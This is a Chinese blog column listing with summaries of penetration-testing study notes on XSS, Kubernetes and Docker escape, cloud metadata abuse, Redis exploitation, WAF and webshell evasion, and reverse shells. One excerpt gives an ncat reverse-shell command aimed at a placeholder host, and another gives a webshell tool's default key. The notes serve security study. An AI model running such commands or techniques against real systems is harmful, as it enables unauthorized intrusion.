
Cyber-Security
文章平均质量分 81
网络安全学习
今天是 几号
剑未配妥 出门已是江湖
展开
-
SRC通杀小技巧-巧用域名“横向移动“
周末闲暇时间无聊顺便挖挖洞,低危小子的我叒找到个低危,本想着一个低危实在是食之无味,弃之又可惜,打算将域名先存起来,等过段时间有活动一块交,就在复制域名的时候,又有了不同的发现,利用以往经验,简单的进行了一波域名的"横向移动",Get到一个小的低危通杀。原创 2024-07-04 10:25:00 · 1242 阅读 · 0 评论 -
记两次简单的edusrc挖掘
服务器程序并未对请求次数进行限制,或者是限制不严格导致,导致可以大量重复发送短信验证码。空格,大小写绕过,修改cookie,修改返回值,多次叠加参数绕过,修改XXF头绕过等可参考,也可配合并发工具Turbo Intruder进行测试。当时有两种思路:一是写一个Python脚本进行post循环发包,循环的过程中后面再双写一遍;我们日常发验证码页面抓包,点击发送。成功发送一条短信,当再次点击时候,已经返回为空了。我们尝试双写,发现可以绕过,而且发送了两条短信,再次发送的时候已经没有反应了。原创 2023-03-10 17:54:08 · 409 阅读 · 0 评论 -
WEB攻防-XSS跨站&反射型&存储型&DOM型&标签闭合&输入输出&JS代码解析
拓展类型:jquery,mxss,uxss,pdfxss,flashxss,上传xss等。安全修复:字符过滤,实例化编码,http_only,CSP防护,WAF拦截等。通过修改原始的客户端代码,受害者浏览器的DOM环境改变,导致有效载荷的执行。攻击利用:盲打,COOKIE盗取,凭据窃取,页面劫持,网络钓鱼,权限维持等。测试流程:看输出想输入在哪里,更改输入代码看执行(标签,过滤决定)存储型XSS是持久化的XSS攻击方式,将恶意代码存储于服务器端,基础类型:反射(非持续),存储(持续),DOM-BASE。原创 2024-06-30 23:55:31 · 840 阅读 · 0 评论 -
APP攻防-资产收集篇&反证书检验&XP框架&反代理VPN&数据转发&反模拟器
代码通过调用System.getProperty(“http.proxyHost”)和System.getProperty(“http.proxyPort”)方法来获取HTTP代理的主机名和端口号。3、反代理VPN:代理检测、VPN检测、发包框架强制不走代理。2、反证书检验:SSL证书绑定(单向校验和双向校验)做移动安全测试时,设置好了代理,但抓不到数据包。双向认证-客户端不仅仅要校验服务端的证书,2、抓不到-app走的不是http/s。单项校验-客户端校验服务端的证书。1、抓不到-工具证书没配置好。原创 2023-11-13 20:49:15 · 1606 阅读 · 1 评论 -
横向移动如何阻止以及防范?
使用EDR工具收集的数据并训练基于AI的网络安全软件,以留意未经授权的访问及可能存在恶意网络活动的其他异常行为,做公司内网资产管理,主要功能包括:==行为管理-服务行为==:梳理对外服务进程及其子进程进行的命令执行,文件创建,网络外联行为,用户通过验证行为清单后,可开启告警模式实现服务行为白名单,但出现新增行为时将立即产生告警事件通知用户==风险发现-弱口令==:很多横向移动的方式都是通过弱口令,已经口令复用(多账号使用同一个口令)进行传递的,EDR可以尝试爆破进行检测是否有弱口令的风险==风险发现-原创 2023-10-17 15:20:51 · 1628 阅读 · 1 评论 -
云上攻防-云原生篇&K8s安全&Config泄漏&Etcd存储&Dashboard鉴权&Proxy暴露
第一种:没有配置指定--client-cert-auth 参数打开证书校验,暴露在外Etcd服务存在未授权访问风险。-暴露外部可以访问,直接未授权访问获取secrets和token利用第二种:在打开证书校验选项后,通过本地127.0.0.1:2379可免认证访问Etcd服务,但通过其他地址访问要携带cert进行认证访问,一般配合ssrf或其他利用,较为鸡肋。-只能本地访问,直接未授权访问获取secrets和token利用第三种:实战中在安装k8s默认的配置2379只会监听本地,如果访问没设置0原创 2023-10-15 21:57:29 · 4056 阅读 · 1 评论 -
云上攻防-云原生篇&Kubernetes&K8s安全&API&Kubelet未授权访问&容器执行
其核心的特点就是能够自主的管理容器来保证云平台中的容器按照用户的期望状态运行着,管理员可以加载一个微型服务,让规划器来找到合适的位置,同时,Kubernetes在系统提升工具以及人性化方面,让用户能够方便的部署自己的应用。目前互联网上针对云原生场景下的攻击手法零零散散的较多,仅有一些厂商发布过相关矩阵技术,但没有过多的细节展示,本文基于微软发布的Kubernetes威胁矩阵进行扩展,介绍相关的具体攻击方法。2、通过容器进行逃逸,从而控制宿主机以及横向渗透到K8s Master节点控制所有容器。原创 2023-10-14 23:35:14 · 5118 阅读 · 0 评论 -
云上攻防-云原生篇&Docker安全&系统内核&版本漏洞&CDK自动利用&容器逃逸
4、实验获取到docker搭建的Web权限后进行逃逸。4、实验获取到docker搭建的Web权限后进行逃逸。实现:信息收集,指定逃逸,自动逃逸,修复功能等。3、编译修改后EXP后等待管理进入执行。1、安装docker对应版本。1、安装docker对应版本。3、上传CDK自动提权反弹。原创 2023-10-14 19:00:37 · 2689 阅读 · 0 评论 -
云上攻防-云原生篇&Docker安全&权限环境检测&容器逃逸&特权模式&危险挂载
Docker 是一个开放源代码软件,是一个开放平台,用于开发应用、交付(shipping)应用、运行应用。Docker允许用户将基础设施(Infrastructure)中的应用单独分割出来,形成更小的颗粒(容器),从而提高交付软件的速度。Docker 容器与虚拟机类似,但二者在原理上不同,容器是将操作系统层虚拟化,虚拟机则是虚拟化硬件,因此容器更具有便携性、高效地利用服务器。原创 2023-10-13 21:42:33 · 3027 阅读 · 0 评论 -
云上攻防-云服务篇&弹性计算&云数据库&实例元数据&控制角色&AK控制台接管
元数据解释:实例元数据(metadata)包含了弹性计算云服务器实例在阿里云系统中的信息,您可以在运行中的实例内方便地查看实例元数据,并基于实例元数据配置或管理实例。(基本信息:实例ID、IP地址、网卡MAC地址、操作系统类型等信息。实例标识包括实例标识文档和实例标识签名,所有信息均实时生成,常用于快速辨别实例身份。各大云元数据地址:阿里云元数据地址:http://100.100.100.200/腾讯云元数据地址:http://metadata.tencentyun.com/原创 2023-10-12 16:16:37 · 1849 阅读 · 0 评论 -
云上攻防-云服务篇&对象存储&Bucket桶&任意上传&域名接管&AccessKey泄漏
云服务,顾名思义就是云上服务,在云厂商上购买的产品服务。国内有阿里云、腾讯云、华为云、天翼云、Ucloud、金山云等,国外有亚马逊的AWS、Google的GCP、微软的Azure,IBM云等。各个云厂商对云服务的叫法都不统一,这里统一以AWS为例。S3 对象存储Simple Storage Service,简单的说就是一个类似网盘的东西EC2 即弹性计算服务Elastic Compute Cloud,简单的说就是在云上的一台虚拟机。原创 2023-10-11 14:24:24 · 3133 阅读 · 0 评论 -
API攻防-接口安全&SOAP&OpenAPI&RESTful&分类特征导入&项目联动检测
接口是后端设计的一套供给第三方使用的方法举个例子,fofa提供了第三方api接口来进行调用,使用查询语法获取资产目标资产信息输入相关参数进行调用API安全就是围绕着这一个接口进行的,可能存在的漏洞包括:SQL注入、身份验证、信息泄漏、XSS跨站等。原创 2023-10-09 11:14:36 · 2343 阅读 · 1 评论 -
安全开发-JS应用&NodeJS指南&原型链污染&Express框架&功能实现&审计&WebPack打包器&第三方库JQuery&安装使用&安全检测
jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。它封装JavaScript常用功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。multer:node.js中间件,用于处理 enctype=“multipart/form-data”(设置表单的MIME编码)的表单数据。body-parser:node.js中间件,用于处理 JSON, Raw, Text和URL编码的数据。原创 2023-08-27 12:32:03 · 2608 阅读 · 0 评论 -
安全开发-JS应用&原生开发&JQuery库&Ajax技术&加密编码库&断点调试&逆向分析&元素属性操作
架构:html js login.html - logincheck.php。架构:html js php - upload.php。前端JS进行后缀过滤,后端PHP进行上传处理。后端PHP进行帐号判断,前端JS进行登录处理。2、禁用JS或删除过滤代码绕过。1、过滤代码能看到分析绕过。3、JS对上传格式判断。4、后端对上传数据处理。2、jQuery库教程。2、JS获取提交数据。2、配置Ajax请求。原创 2023-07-21 14:07:52 · 2675 阅读 · 0 评论 -
安全开发-PHP应用&模版引用&Smarty渲染&MVC模型&数据联动&RCE安全&TP框架&路由访问&对象操作&内置过滤绕过&核心漏洞
没有启用路由的情况下典型的URL访问规则是:http://serverName/index.php(或者其它应用入口文件)/模块/控制器/操作/[参数名/参数值…4、创建一个名为index.tpl的模板文件,并将以下代码复制到上述点定义文件夹中。1、创建一个文件夹,命名为smarty-demo。例子1:写法内置安全绕过-TP5-SQL注入。例子2:内置版本安全漏洞-TP5-代码执行。例子:不合规的代码写法-TP5-自写。4、文件上传操作-应用对象。2、路由访问-URL访问。3、数据库操作-应用对象。原创 2023-07-19 10:38:33 · 1712 阅读 · 1 评论 -
安全开发-PHP应用&文件管理模块&显示上传&黑白名单类型过滤&访问控制&文件管理模块&包含&上传&遍历&写入&删除&下载&安全
_FILES:PHP中一个预定义的超全局变量,用于在上传文件时从客户端接收文件,并将其保存到服务器上。$_FILES[“表单值”][“tmp_name”] 获取上传的临时副本文件名。$_FILES[“表单值”][“type”] 获取上传文件MIME类型。$_FILES[“表单值”][“size”] 获取上传文件字节单位大小。$_FILES[“表单值”][“name”] 获取上传文件原始名称。-文件包含,文件上传,文件下载,文件删除,文件写入,文件遍历。2、fopen() fread() 文件打开读入。原创 2023-07-16 19:07:35 · 1642 阅读 · 0 评论 -
安全开发-PHP应用&留言板功能&超全局变量&数据库操作&第三方插件引用&后台模块&Session&Cookie&Token&身份验证&唯一性
而不采用token机制的Web应用程序,一般会使用session机制来保存用户登录状态,服务器会在用户登录成功后创建一个session,之后的每个请求都需要在HTTP头中附带这个session ID,以便服务器能够验证用户身份。而不采用token机制的Web应用程序,一般会在服务器上存储用户的登录状态,因此如果服务器被黑客攻击,黑客可能会获得用户的敏感信息。而不采用token机制的Web应用程序,在跨域访问时,需使用cookie或session来传递用户身份信息,比较麻烦。原创 2023-07-15 18:45:52 · 4544 阅读 · 0 评论 -
信息打点-公众号服务&Github监控&供应链&网盘泄漏&证书图标邮箱资产
如:企业招标,人员信息,业务产品,应用源码等。主要就是查看网盘中是否存有目标的敏感文件。案例4–不靠系统漏洞,从外网获取域控。2、语法固定长期后续监控新泄露。2、微信公众号有无第三方服务。-后续会详细讲到各类工具项目。1、人员&域名&邮箱等筛选。案例2–爱企查隐藏的惊喜。1、获取微信公众号途径。案例1–招标平台二级跳。案例3–邮箱爆破到内网。原创 2023-06-09 08:46:55 · 1683 阅读 · 0 评论 -
信息打点-红蓝队自动化项目&资产侦察&武器库部署&企查产权&网络空间
本项目集成了全网优秀的开源攻防武器项目,包含信息收集工具(自动化利用工具、资产发现工具、 目录扫描工具、子域名收集工具、指纹识别工具、端口扫描工具、各种插件…)、应急响应工具、甲方运维工具、等其他安全攻防资料整理,供攻防双方使用。AsamF集成了Fofa、Hunter、Quake、Zoomeye、Shodan、爱企查、Chinaz、0.zone、subfinder。AsamF支持Fofa、Hunter、Quake、Zoomeye、Shodan、Chinaz、0.zone配置多个Key。原创 2023-06-08 17:00:32 · 1829 阅读 · 0 评论 -
WAF攻防-菜刀&冰蝎&哥斯拉&流量通讯&特征绕过&检测反制&感知
使用Proxifier进行流量转发至Burp抓包分析(使用Wireshake也可以)# ==冰蝎3-流量&绕过&特征&检测== **面试必问的,别问我怎么知道的**冰蝎利用了服务器端的脚本语言加密功能,通讯的过程中,消息体内容采用 AES 加密,基于特征值检测的安全产品无法查出## 特征密钥使用连接密码的md5结果的前16位 如果对方使用的默认密码rebeyond,那么密钥就是e45e329feb5d925b,那么这也算是一个特征原创 2023-04-12 22:12:22 · 1833 阅读 · 0 评论 -
WAF攻防-权限控制&代码免杀&异或运算&变量覆盖&混淆加密&传参
# 基础-脚本后门控制原理-代码解释对比工具代码-菜刀&蚁剑&冰蝎&哥斯拉等# 原理-脚本后门查杀机制-函数&行为对比WAF规则-函数匹配&工具指纹等# 代码-脚本后门免杀变异-覆盖&传参原创 2023-04-10 21:44:14 · 642 阅读 · 0 评论 -
WAF攻防-信息收集&识别&被动探针&代理池&仿指纹&白名单
3、白名单:模拟白名单模拟WAF授权测试,解决速度及测试拦截。4、模拟用户:模拟真实用户数据包请求探针,解决WAF指纹识别。2、代理池:在确保速度的情况下解决请求过快封IP的拦截。Xray-配置修改&进程转发 Proxifier。#信息收集-目录扫描-Python代理加载脚本。3、脚本或工具的检测Payload。1、延迟:解决请求过快封IP的情况。Goby-配置加入Socket代理。Awvs-设置速度&加入代理。2、脚本或工具的指纹被识别。1、脚本或工具速度流量快。原创 2023-04-10 21:10:15 · 628 阅读 · 0 评论 -
信息打点-APP资产&知识产权&应用监控&静态提取&动态抓包&动态调试
通过获取App配置、数据包,去获取url、api、osskey、js等敏感信息。2、泄露信息-配置key 资源文件 - key(osskey利用,邮件配置等)案例:某APP打开无数据包,登录有数据包(反编译后未找到目标资产,抓包住到了)1、资产信息-IP 域名 网站 -转到对应Web测试 接口测试 服务测试。3、代码信息-java代码安全问题- 逆向相关。2、提取-静态表现&动态调试。3、动态调试从表现中提取数据。2、反编译从源码中提取数据。1、抓包抓表现出来的数据。2、网站上有APP下载。原创 2023-04-04 12:10:25 · 1080 阅读 · 0 评论 -
信息打点-语言框架&开发组件&FastJson&Shiro&Log4j&SpringBoot等
后端CMS:一般PHP开发居多源码程序(利用源码程序名去搜漏洞情况,源码去下载进行后期的代码审计)前端js 框架(爬取更多的js从里面筛选URL或敏感泄漏key等)也是可以通过对js代码逻辑进行代码审计组件java居多,第三方的功能模块(日志记录,数据监控,数据转换等)常见有过安全漏洞组件(shiro solr log4j sprintboot等)框架php java python都有简单代码的一个整合库,如果使用框架就只需要学习使用框架调用即可。原创 2023-03-31 12:46:34 · 1036 阅读 · 0 评论 -
信息打点-CDN绕过&业务部署&漏洞回链&接口探针&全网扫描&反向邮件
全网扫描:https://github.com/Pluto-123/Bypass_cdn。全网扫描:https://github.com/boy-hack/w8fuckcdn。接口查询:https://fofa.info/extensions/source。接口查询:https://fofa.info/extensions/source。全网扫描:https://github.com/Tai7sy/fuckcdn。国外请求:https://boce.aliyun.com/detect/原创 2023-03-30 09:44:14 · 1284 阅读 · 0 评论 -
信息打点-主机架构&蜜罐识别&WAF识别&端口扫描&协议识别&服务安全
利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。根据蜜罐与攻击者之间进行的交互的程度可以将蜜罐分为三类:低交互蜜罐、中交互蜜罐、高交互蜜罐。当然还可以根据蜜罐模拟的目标进行分类,比如:数据库蜜罐、工控蜜罐、物联网蜜罐、Web蜜罐等等。使用参考: https://blog.csdn.net/qq_53079406/article/details/125266331。云WAF:百度安全宝、阿里云盾、长亭雷池,华为云,亚马逊云等。原创 2023-03-29 21:29:02 · 2258 阅读 · 0 评论 -
信息打点-JS架构&框架识别&泄漏提取&API接口枚举&FUZZ爬虫&插件项目
在Javascript中也存在变量和函数,当存在可控变量及函数调用即可参数漏洞JS开发的WEB应用和PHP,JAVA,NET等区别在于即没有源代码,也可以通过浏览器的查看源代码获取真实的点。获取URL,获取JS敏感信息,获取代码传参等,所以相当于JS开发的WEB应用属于白盒测试(默认有源码参考),一般会在JS中寻找更多的URL地址,在JS代码逻辑(加密算法,APIkey配置,验证逻辑等)进行后期安全测试。前提:Web应用可以采用后端或前端语言开发。原创 2023-03-27 23:40:03 · 2082 阅读 · 0 评论 -
几种区分Spring与Structs2中间件的方法
举个例子,对于如下URL:http://127.0.0.1:9999/S2_016_war/barspace/login.action。/S2-016-war/部分是war包部署的工程名,也可以说是项目名、上下文等等,说法不一。/login部分是Struts2的action名,指向具体处理请求的Java类。.action部分是Struts2的扩展名,也可以定义为.do、.dw等等。正常URL地址为http://www.xxx.com:8080/写入乱码字符使得页面报错500响应码,报错抛出异常信息。原创 2023-03-23 18:10:58 · 447 阅读 · 0 评论 -
基础入门-ChatGPT&结合安全&融入技术&高效赋能&拓展需求
ChatGPT–可能很多人被这个缩写的名字搞糊涂了,第一眼无法看出到底什么意思,GPT 的英文原文是 Generative Pre-training Transformer(预训练生成模型),业界有人将 ChatGPT 概括为聊天机器人+搜索工具+文本创造工具的组合,或者简单理解它是一个生成式 AI(内容生成器)。它的主要功能是协助回答问题、提供信息和生成有关历史、科学、地理等各种主题的信息,这些信息仅限于它所接受的训练,但其知识在不断扩展。2、如何使用Python写一个Webshell检测脚本?原创 2023-03-18 21:50:01 · 3476 阅读 · 0 评论 -
基础入门 HTTP数据包&Postman构造&请求方法&请求头修改&状态码判断
•put:向指定资源位置上上传其最新内容(从客户端向服务器传送的数据取代指定文档的内容),与post的区别是put为幂等,post为非幂等;•post:向指定资源提交数据进行处理请求(提交表单、上传文件),又可能导致新的资源的建立或原有资源的修改;•head:与服务器索与get请求一致的相应,响应体不会返回,获取包含在小消息头中的原信息(与get请求类。•trace:回显服务器收到的请求,用于测试和诊断。•delete:请求服务器删除request-URL所标示的资源*(请求服务器删除页面)原创 2023-03-18 21:07:08 · 1868 阅读 · 0 评论 -
基础入门-算法逆向&散列对称非对称&JS源码逆向&AES&DES&RSA&SHA
单向散列加密的缺点就是存在暴力破解的可能性,最好通过加盐值的方式提高安全性,此外可能存在散列冲突。非对称加密的优点是与对称加密相比,安全性更好,加解密需要不同的密钥,公钥和私钥都可进行相互的加解密。缺点是发送方和接收方必须商定好密钥,然后使双方都能保存好密钥,密钥管理成为双方的负担。对称加密优点是算法公开、计算量小、加密速度快、加密效率高。解密需求:密文,模式,加密Key,偏移量,条件满足才可解出。2、明文越长密文越长,一般不会出现"/“”+"在密文中。方便存储,损耗低:加密/加密对于性能的损耗微乎其微。原创 2023-03-18 20:31:17 · 1239 阅读 · 0 评论 -
基础入门-算法分析&传输加密&数据格式&密文存储&代码混淆&逆向保护
MD5,SHA,ASC,进制,时间戳,URL,BASE64,Unescape,AES,DES等。BASE64值是由数字"0-9"和字母"a-f"所组成的字符串,大小写敏感,结尾通常有符号=URL编码是由数字"0-9"和字母"a-f"所组成的字符串,大小写敏感,通常以%数字字母间隔。直接加密,带salt,带密码,带偏移,带位数,带模式,带干扰,自定义组合等。MD5值是32或16位位由数字"0-9"和字母"a-f"所组成的字符串。SHA1这种加密的密文特征跟MD5差不多,只不过位数是40。原创 2023-03-17 22:33:34 · 1591 阅读 · 0 评论 -
redis未授权访问利用汇总
原理就是在数据库中插入一条数据,将本机的公钥作为value,key值随意,然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys,把缓冲的数据保存在文件里,这样就可以在服务器端的/root/.ssh下生成一个授权的key。/var/spool/cron/ 这个目录下存放的是每个用户包括root的crontab任务,每个任务以创建者的名字命名,比如tom建的crontab任务对应的文件就是/var/spool/cron/tom。原创 2023-03-17 17:55:40 · 1319 阅读 · 0 评论 -
文件关联型木马
双击txt文档,计算机用记事本打开txt文件,双击cvs文件,计算机默认使用Excel打开文件。以上txt文档与记事本建立了文件关联。也就是对某种文件类型(区分于文件拓展名)默认打开方式。原创 2023-03-12 18:19:52 · 323 阅读 · 0 评论 -
BloodHound Neo4j:Invoke-Neo4j : Could not find java at ……
使用BloodHound准备收集域信息时,需要搭建neo4j数据库,而neo4j又需要java环境,电脑上明明装了java环境怎么设置环境变量都是报错。原创 2023-03-12 09:48:22 · 872 阅读 · 0 评论 -
Proxifier转发Burpsuite联动xray抓微信小程序数据包
打开微信小程序后,在任务管理器中查看当前进程属性,复制exe地址链接在Proxifier中导入。已安装Burp、xray、Proxifier等。随手一点,发现小程序敏感信息泄露。如何准确的设置代理规则呢?原创 2023-03-09 12:48:25 · 1694 阅读 · 0 评论 -
基础入门-抓包技术&HTTPS协议&WEB&封包监听&网卡模式&APP&小程序
是一个http协议调试代理工具,它能够记录并检查所有你的电脑和互联网之间的http通讯,设置断点,查看所有的“进出”Fiddler的数据(指cookie,html,js,css等文件)。该系统具有行业领先的专家分析技术,通过捕获并分析网络中传输的底层数据包,对网络故障、网络安全以及网络性能进行全面分析,从而快速排查网络中出现或潜在的故障、安全及性能问题。是用于攻击web 应用程序的集成平台,包含了许多工具。是强大的网络封包编辑器,wpe可以截取网络上的信息,修改封包数据,是外挂制作的常用工具。原创 2023-03-09 09:13:29 · 1234 阅读 · 2 评论 -
基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
ping命令走的ICMP协议,而防火墙禁用端口是控制TCP/UDP协议,也就是控制传输层,ncat -e /bin/sh x.x.x.x 5566 linux反弹windows上。NC(ncat)瑞士军刀:linux系统下自带,windows下需要下载。为什么开启防火墙后 whoami数据还是可以带外回显?ping命令走的ICMP协议,而防火墙禁用端口是控制TCP/UDP协议,也就是控制传输层,但是ICMP是网络层,是传输层下层,不受防火墙影响。所以可以使用ping命令将数据带出。原创 2023-03-08 21:40:40 · 1502 阅读 · 1 评论 -
基础入门-APP架构&小程序&H5+Vue语言&Web封装&原生开发&Flutter
Web App一般非常小,内容都是app内的网页展示,受制于网页技术本身,可实现功能少,而且每次打开,几乎所有的内容都需要重新加载,所以反应速度慢,内容加载过多就容易卡死,用户体验差,而且app内的交互设计等非常有效。flutter是近年来谷歌推出的一款UI框架,使用dart语言进行开发,支持跨平台,weight渲染直接操作硬件层,体验可媲美原生。使用H5开发的好处有很多,可多端复用,比如浏览器端,ios端,当然H5开发的体验是没有原生好的。安全影响:API&JS框架安全问题&JS前端测试。原创 2023-03-07 12:06:55 · 1023 阅读 · 0 评论 -
小迪安全2023期笔记汇总-持续更新
基础入门-算法逆向&散列对称非对称&JS源码逆向&AES&DES&RSA&SHA。基础入门-HTTP数据包&Postman构造&请求方法&请求头修改&状态码判断。信息打点-Web应用&源码泄漏&开源闭源&指纹识别&GIT&SVN&DS&备份。基础入门-ChatGPT篇&注册体验&结合安全&融入技术&高效赋能&拓展需求。信息打点-Web应用&企业产权&指纹识别&域名资产&网络空间&威胁情报。原创 2023-03-03 17:45:31 · 14905 阅读 · 21 评论